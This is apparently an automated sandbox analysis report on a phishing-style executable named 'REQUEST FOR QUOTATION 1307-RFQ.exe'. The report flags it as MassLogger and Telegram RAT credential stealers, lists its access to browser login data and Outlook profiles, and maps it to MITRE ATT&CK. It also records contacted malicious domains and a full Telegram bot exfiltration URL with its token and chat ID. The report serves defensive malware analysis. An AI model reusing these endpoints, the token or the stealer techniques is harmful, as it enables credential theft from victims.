Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTBF36.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTBF47.tmp VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\perfhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara detected MassLogger RAT

Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Yara detected MassLogger RAT

Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_81
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_XP
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_XPe
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_VISTA
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_7
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: WIN_8
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	12 Native API	1 LSASS Driver	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	1 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	127 System Information Discovery	Distributed Component Object Model	121 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Valid Accounts	1 Software Packing	LSA Secrets	341 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Windows Service	1 DLL Side-Loading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	212 Process Injection	1 File Deletion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	222 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Valid Accounts	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	212 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
REQUEST FOR QUOTATION 1307-RFQ.exe	82%	ReversingLabs	Win32.Virus.Expiro
REQUEST FOR QUOTATION 1307-RFQ.exe	100%	Avira	W32/Infector.Gen
REQUEST FOR QUOTATION 1307-RFQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
przvgke.biz	172.234.222.138	true	false	high
76899.bodis.com	199.59.243.227	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
ifsaia.biz	13.251.16.150	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
ww99.przvgke.biz	72.52.179.174	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
ww99.fwiwk.biz	72.52.179.174	true	false	unknown
saytjshyf.biz	44.221.84.105	true	false	high
084725.parkingcrew.net	76.223.26.96	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
fwiwk.biz	172.234.222.143	true	false	high
vcddkls.biz	18.141.10.107	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
api.telegram.org	149.154.167.220	true	false	high
ww7.fwiwk.biz	unknown	unknown	true	unknown
zlenh.biz	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
ww12.przvgke.biz	unknown	unknown	true	unknown
anpmnmxo.biz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://przvgke.biz/vuox	false
https://reallyfreegeoip.org/xml/8.46.123.189	false
http://saytjshyf.biz/xoqfqirqhp	false
http://ifsaia.biz/mmbextsivoeuyvtt	false
https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189	true
http://knjghuig.biz/sjqomgqqk	false
http://vjaxhpbji.biz/v	true
http://vjaxhpbji.biz/tcmuebmfxhuj	true
http://checkip.dyndns.org/	false
http://lpuegx.biz/rdnh	true
http://ssbzmoy.biz/ndknji	false
http://cvgrf.biz/dy	true
http://pywolwnvd.biz/vayts	true
http://fwiwk.biz/wxalwqn	false
http://xlfhhhm.biz/jsoiayboaqe	false
http://przvgke.biz/asgidloooxieajf	false
http://vcddkls.biz/kknpblsbxdrrjko	false
http://npukfztj.biz/un	false
http://lpuegx.biz/at	true

URLs from Memory and Binaries

Name	Source	Malicious
http://44.221.84.105/I	armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://ww12.przvgke.bize4-4079-b30a-7368302a1ad4h	armsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmp	false
https://crbug.com/820996LaunchElevatedProcessdisable-best-effort-tasksdisable-breakpaddisable-featur	Acrobat.exe.1.dr	false
https://reallyfreegeoip.org/xml/8.46.123.189=4	RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false
http://ww99.przvgke.biz/	armsvc.exe	false
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	true
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	true
http://82.112.184.197/ath	armsvc.exe, 00000001.00000003.2334989969.0000000000720000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/unj	armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839	RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	false
http://18.141.10.107/N	armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/3	armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp	false
https://crbug.com/820996	Acrobat.exe.1.dr	false
